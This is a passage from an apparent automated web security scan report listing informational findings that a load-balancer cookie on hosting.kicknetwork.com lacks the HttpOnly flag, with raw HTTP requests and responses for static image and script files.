The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/kangaroo.png HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:55 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce65-1bee-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 7150
Content-Type: image/png
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

.PNG
.
...IHDR...C...b......:n.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..] t\.y...M.}..%.......5lf.S8..
.N([.$..4....4pN......I..9.RC.i.6..K.Y.v...7..M.nI3.y.........4#..\.....7.}....W.....
...[SNIP]...

4.10. http://hosting.kicknetwork.com/afterdark/images/leftBt.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/leftBt.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/leftBt.png HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:24 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68d258-14d-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 333
Content-Type: image/png
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

.PNG
.
...IHDR.............. ......tEXtSoftware.Adobe ImageReadyq.e<....IDATx...M
.@..a'..j.....U.p. .....C...E.N...u...x..0..@0..3 /.1<..(...!..t..I..m)....c.i..t. ..,.N..i..<...B.-.].u.4.!.. .f..
...[SNIP]...

4.11. http://hosting.kicknetwork.com/afterdark/images/logo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/logo.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/logo.jpg HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:26 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68d259-23c6-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 9158
Content-Type: image/jpeg
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................M.\..
...[SNIP]...

4.12. http://hosting.kicknetwork.com/afterdark/images/menu-sprite.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/menu-sprite.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/menu-sprite.jpg HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 404 Not Found
Date: Thu, 28 Apr 2011 18:29:31 GMT
Server: Apache/2.2.14 (EL)
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /afterdark/images/menu-sprite.jpg was not found on th
...[SNIP]...

4.13. http://hosting.kicknetwork.com/afterdark/images/menu_sprite.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/menu_sprite.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/menu_sprite.jpg HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:20 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce4e-877d-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 34685
Content-Type: image/jpeg
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................R....
...[SNIP]...

4.14. http://hosting.kicknetwork.com/afterdark/images/newsletterBg.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/newsletterBg.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/newsletterBg.png HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:41 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce48-22a-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 554
Content-Type: image/png
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

.PNG
.
...IHDR.......1.......*l....tEXtSoftware.Adobe ImageReadyq.e<....IDATx....M.P...g.1B@...@....TtlA...1.....3.GB........zE...'.<....Yn..;.......,....d..).}...m<\.........r.....h............f.v
...[SNIP]...

4.15. http://hosting.kicknetwork.com/afterdark/images/pollBg.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/pollBg.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/pollBg.png HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:20 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce2e-6ef-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 1775
Content-Type: image/png
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

.PNG
.
...IHDR...O...f......n......tEXtSoftware.Adobe ImageReadyq.e<....IDATx...=KdW....6".A.,.J..-..B.$...>.+.B.@*.|......3...:KH.A..-,..Q4q...d.p<sF......w^.S....x.....'......R5S.O}^=.....&0G.m...
...[SNIP]...

4.16. http://hosting.kicknetwork.com/afterdark/images/pollheader.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/pollheader.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/pollheader.png HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:20 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce59-96a-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 2410
Content-Type: image/png
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

.PNG
.
...IHDR.......7.....!o.j....tEXtSoftware.Adobe ImageReadyq.e<.. .IDATx..].q.8..\N........
A
A..M
...U........a..2.-.i.1p..@.#._.jj$..F.......wF ...'...@.'..Dp..@.'..Dp..0...?...;Q?...QJ.... .
...[SNIP]...

4.17. http://hosting.kicknetwork.com/afterdark/images/rightArrow.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/rightArrow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/rightArrow.png HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:40 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce23-160-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 352
Content-Type: image/png
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

.PNG
.
...IHDR..............V%.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.btrr.a``Pg.......;.9........ >..o....K3#P.....3.=........>.....U3.....4......j..kkk...=z.;V. `aaA...'N|....LMM .p....X5
...[SNIP]...

4.18. http://hosting.kicknetwork.com/afterdark/images/rightBt.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/rightBt.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/rightBt.png HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:24 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce4d-153-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 339
Content-Type: image/png
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

.PNG
.
...IHDR.............. ......tEXtSoftware.Adobe ImageReadyq.e<....IDATx...A
.@.....
. .Z...p.>h.-.. ....*..fK......j.pB...C{.3...0c<..%c,f.. 1. M...i...k.............:t..\....g.q..V..[Mo.Bw..
...[SNIP]...

4.19. http://hosting.kicknetwork.com/afterdark/images/shadow.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/shadow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/shadow.png HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:55 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce2d-ce-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 206
Content-Type: image/png
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

.PNG
.
...IHDR.......n......B.;....tEXtSoftware.Adobe ImageReadyq.e<...pIDATx....
. .D....y}y..hc..........&Dd.9.|.v.....%.hT......j.E....P..Q....2,......<....}..C..k}..t.SO.+ .^..p.0.C.o= =......IE
...[SNIP]...

4.20. http://hosting.kicknetwork.com/afterdark/images/shoppingcart.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/shoppingcart.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/shoppingcart.jpg HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:26 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce34-1f5-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 501
Content-Type: image/jpeg
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

4.21. http://hosting.kicknetwork.com/afterdark/images/submitBt.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/submitBt.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/submitBt.png HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:45 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce6f-45c-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 1116
Content-Type: image/png
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

.PNG
.
...IHDR...F.........
b*.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Y.OSW..@...Z...-..a..D...-...h.1.........{..y.Y.H41.^.,Y.6. .6..Ij..-.....^...{..V$...2..........s.?.m.nG.x..">...*.w.
...[SNIP]...

4.22. http://hosting.kicknetwork.com/afterdark/images/subnav.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/subnav.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/subnav.gif HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:55 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce42-4af-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 1199
Content-Type: image/gif
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

GIF89a..$....................................................................................................!.......,......$.......Hg.h..l..p,.tm.x..|....pH,....r.l:.:D.......g..z...xL.....z.n....|N.
...[SNIP]...

4.23. http://hosting.kicknetwork.com/afterdark/images/tab_blogs.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/tab_blogs.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/tab_blogs.jpg HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:24 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce6c-a09-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 2569
Content-Type: image/jpeg
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

4.24. http://hosting.kicknetwork.com/afterdark/images/thisMonth.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/thisMonth.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/thisMonth.png HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:24 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68d25b-9f5-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 2549
Content-Type: image/png
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

.PNG
.
...IHDR...z...x.....=.......tEXtSoftware.Adobe ImageReadyq.e<.. .IDATx...kh.W..o7i7..5..ok.H.R...KPZ......Ri.R..
.B.TZZ(..mi........."....b.....S.#...GL..@...t.........=8l.;...7..s.=3).q.p
...[SNIP]...

4.25. http://hosting.kicknetwork.com/afterdark/images/vipHeader.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/vipHeader.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/vipHeader.png HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:24 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce3e-1922-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 6434
Content-Type: image/png
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

.PNG
.
...IHDR...=...&.......Lq....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]w..U......4."Hh..F...Q.h......xvPWq.....1.?..........=;bvv....t..*.$%...A.........w..^....s....Z...u..W..}.~7ID..$...[
...[SNIP]...

4.26. http://hosting.kicknetwork.com/afterdark/js/Champagne__Limousines_200-Champagne__Limousines_500-Champagne__Limousines_italic_200-Champagne__Limousines_italic_500.font.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/Champagne__Limousines_200-Champagne__Limousines_500-Champagne__Limousines_italic_200-Champagne__Limousines_italic_500.font.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/js/Champagne__Limousines_200-Champagne__Limousines_500-Champagne__Limousines_italic_200-Champagne__Limousines_italic_500.font.js HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

4.27. http://hosting.kicknetwork.com/afterdark/js/cookies.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/cookies.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/js/cookies.js HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:42 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:32 GMT
ETag: "68cebc-270-497f3f0582c00"
Accept-Ranges: bytes
Content-Length: 624
Content-Type: application/x-javascript
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

function createCookieSS(name,value,days) {
   if (days) {
